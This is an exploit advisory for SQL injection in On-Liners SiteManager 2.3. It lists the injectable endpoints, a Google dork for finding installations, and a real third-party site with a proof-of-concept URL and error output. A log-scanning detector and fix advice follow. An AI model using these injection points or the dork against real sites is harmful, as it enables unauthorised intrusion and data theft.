On-Liners WebDesign SiteManager version 2.3 Onliners S.A.R.L suffers from a remote SQL injection vulnerability.
#################################################################################################
# Exploit Title : On-Liners WebDesign SiteManager V2.3 Onliners S.A.R.L SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepage : On-Liners.Com
# Category : WebApps
# Tested On : Windows and Linux
# Exploit Risk : Medium
# Web Server : Nginx 1.10.3
# JavaScript Frameworks : jQuery 2.2.4
# Operating System : Ubuntu OS
# Version Information : 2.3
# Google Dorks : intext:''Designed & Developed by Onliners dot com SARL'' + ''intext:''SITEMANAGER V2.3 Onliners s.a.r.l.''
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# CxSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018050317
#################################################################################################
+ Arabia On-Liners.Com WebDesign SiteManager V2.3 Onliners S.A.R.L SQL Injection Vulnerability
#################################################################################################
SQL Injection Exploits =>
/aboutus.php?id=[SQL Injection]
/courses.php?catId=[ID-Number]&subcatId=[SQL Injection]
/registration.php?id=[SQL Injection]
#################################################################################################
# Example Site => icmd.com.sa/courses.php?catId=11&subcatId=11%27 => [ Proof of Concept for SQL Inj ] => archive.is/JNyib
# SQL/DB Error :
Deprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/icmd911/public_html/connection_open.php on line 61
Warning: Cannot modify header information - headers already sent by (output started at /home/icmd911/public_html/connection_open.php:84) in /home/icmd911/public_html/courses.php on line 7
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in /home/icmd911/public_html/courses.php on line 13
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in /home/icmd911/public_html/courses.php on line 30
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
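# Detection example (added here, not part of the original advisory or the vendor's code): a log check for the three endpoints listed above, flagging requests whose injectable parameter is not a plain integer. It assumes combined-format access logs and that these parameters are numeric IDs, as the advisory's example values suggest; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoints and injectable parameters named in the advisory.
WATCHED = {
    "/aboutus.php": {"id"},
    "/courses.php": {"subcatId"},
    "/registration.php": {"id"},
}
# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate values are short decimal IDs, like the "11" in the advisory.
INT_RE = re.compile(r"[0-9]{1,10}")

def suspicious_params(url):
    """Return [(param, decoded_value)] for watched params that are not plain integers."""
    parts = urlsplit(url)
    watched = WATCHED.get(parts.path)
    if not watched:
        return []
    hits = []
    # parse_qsl percent-decodes, so %27 is compared as a literal single quote.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in watched and not INT_RE.fullmatch(value):
            hits.append((name, value))
    return hits

def scan(lines):
    """Yield (client_ip, url, hits) for each log line that trips the check."""
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = suspicious_params(m.group(1))
        if hits:
            yield line.split(" ", 1)[0], m.group(1), hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Dec/2018:10:00:01 +0000] "GET /courses.php?catId=11&subcatId=11 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [30/Dec/2018:10:00:05 +0000] "GET /courses.php?catId=11&subcatId=11%27 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [30/Dec/2018:10:00:09 +0000] "GET /aboutus.php?id=3 HTTP/1.1" 200 4300 "-" "Mozilla/5.0"',
    '203.0.113.4 - - [30/Dec/2018:10:01:00 +0000] "GET /registration.php?id= HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, url, hits in scan(SAMPLE_LOG):
        print(ip, url, hits)
```

# The same integer-only rule, enforced server-side before the value reaches a query built with mysqli or PDO prepared statements (the replacements named in the deprecation notice above), closes the hole rather than only detecting probes.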